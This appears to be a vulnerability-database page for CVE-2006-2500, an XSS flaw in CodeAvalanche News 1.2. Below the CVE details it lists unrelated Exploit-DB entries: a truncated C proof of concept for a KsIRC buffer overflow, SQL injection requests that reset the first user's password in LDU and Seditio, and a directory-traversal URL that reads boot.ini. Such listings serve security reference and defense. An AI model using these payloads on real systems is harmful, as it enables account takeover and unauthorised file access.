CVE-2006-2500
published 2006-05-20CVE-2006-2500: Cross-site scripting (XSS) vulnerability in add_news.asp in CodeAvalanche News (CANews) 1.2 allows remote attackers to inject arbitrary web script or HTML via…
PriorityP419medium6.8CVSS 2.0
AVNACMAuNCPIPAP
EPSS
1.64%
73.4th percentile
Cross-site scripting (XSS) vulnerability in add_news.asp in CodeAvalanche News (CANews) 1.2 allows remote attackers to inject arbitrary web script or HTML via the Headline field. NOTE: if this issue is limited to administrators, and if it is expected behavior for administrators to be able to generate HTML, then this is not a vulnerability.
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| xfairguy | codeavalanche_news | — | — |
Stop checking back — get the weekly exploitation signal.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
No detection rules found.
Exploit-DB
KsIRC 1.3.12 - 'PRIVMSG' Remote Buffer Overflow (PoC)
exploitdb·2006-12-26
CVE-2006-6811 KsIRC 1.3.12 - 'PRIVMSG' Remote Buffer Overflow (PoC)
KsIRC 1.3.12 - 'PRIVMSG' Remote Buffer Overflow (PoC)
---
// KSirc 1.3.12 - PRIVMSG remote Buffer Overflow // PoC
//
// Federico L. Bossi Bonin
// [email protected]
// www.GlobalST.com.ar
// #0 0xb7ea8792 in KSircIOController::stdout_read () from /usr/kde/3.5/lib/libkdeinit_ksirc.so
// #1 0xb7ea78c8 in KSircIOController::qt_invoke () from /usr/kde/3.5/lib/libkdeinit_ksirc.so
// #2 0xb6fedba4 in QObject::activate_signal () from /usr/qt/3/lib/libqt-mt.so.3
// #3 0xb765410b in KProcess::receivedStdout () from /usr/kde/3.5/lib/libkdecore.so.4
// #4 0x081a6e60 in ?? ()
// #5 0x081a7238 in ?? ()
// #6 0xbfcb0170 in ?? ()
// #7 0x00000000 in ?? ()
#include
#include
#include
#include
#define PORT 6667
#define LEN 2500
char buffer[LEN*2];
void sendbuff(int sock) {
char ptr[LEN*2];
memse
Exploit-DB
LDU 8.x - avatarselect id SQL Injection
exploitdb·2006-11-21
CVE-2006-6577 LDU 8.x - avatarselect id SQL Injection
LDU 8.x - avatarselect id SQL Injection
---
LDU http://www.victim.com/users.php?m=profile&a=avatarselect&x=XVALUE&id=default.gif[SQL Inject]
GET -> http://www.victim.com/users.php?m=profile&a=avatarselect&x=011A99&id=default.gif%2500%2527,user_password=%2527e10adc3949ba59abbe56e057f20f883e%2527/**/where/**/user_id=1/* with this example remote attacker changes password of 1st user of LDU to 123456
The XVALUE comes with your avatarselect link it's special to everyuser in LDU.
For using this vulnerability you must be logged in to LDU...
# nukedx.com [2006-11-21]
# milw0rm.com [2006-11-21]
Exploit-DB
Seditio 1.10 - avatarselect id SQL Injection
exploitdb·2006-11-21
CVE-2006-6177 Seditio 1.10 - avatarselect id SQL Injection
Seditio 1.10 - avatarselect id SQL Injection
---
Seditio http://www.victim.com/users.php?m=profile&a=avatarselect&x=XVALUE&id=default.gif[SQL Inject]
GET -> http://www.victim.com/users.php?m=profile&a=avatarselect&x=011A99&id=default.gif%2500%2527,user_password=%2527e10adc3949ba59abbe56e057f20f883e%2527/**/where/**/user_id=1/* with this example remote attacker changes password of 1st user of Seditio to 123456
The XVALUE is comes with your avatarselect link it's special to everyuser in Seditio.
For using this vulnerability you must be logged in to Seditio...
# nukedx.com [2006-11-21]
# milw0rm.com [2006-11-21]
Exploit-DB
HP Color LaserJet 2500/4600 Toolbox - Directory Traversal
exploitdb·2006-04-03
CVE-2006-1654 HP Color LaserJet 2500/4600 Toolbox - Directory Traversal
HP Color LaserJet 2500/4600 Toolbox - Directory Traversal
---
source: https://www.securityfocus.com/bid/17367/info
The HP Color LaserJet 2500/4600 Toolbox is prone to a directory-traversal vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input.
An attacker can exploit this vulnerability to retrieve arbitrary files from the vulnerable system in the context of the affected application. Information obtained may aid attackers in further attacks.
http://www.example.com:5225/../../../boot.ini
No writeups or analysis indexed.
http://colander.altervista.org/advisory/CANews.txthttp://secunia.com/advisories/20171http://www.osvdb.org/25653http://www.securityfocus.com/archive/1/434730/100/0/threadedhttp://www.securityfocus.com/bid/18032http://www.vupen.com/english/advisories/2006/1870https://exchange.xforce.ibmcloud.com/vulnerabilities/26587http://colander.altervista.org/advisory/CANews.txthttp://secunia.com/advisories/20171http://www.osvdb.org/25653http://www.securityfocus.com/archive/1/434730/100/0/threadedhttp://www.securityfocus.com/bid/18032http://www.vupen.com/english/advisories/2006/1870https://exchange.xforce.ibmcloud.com/vulnerabilities/26587
2006-05-20
Published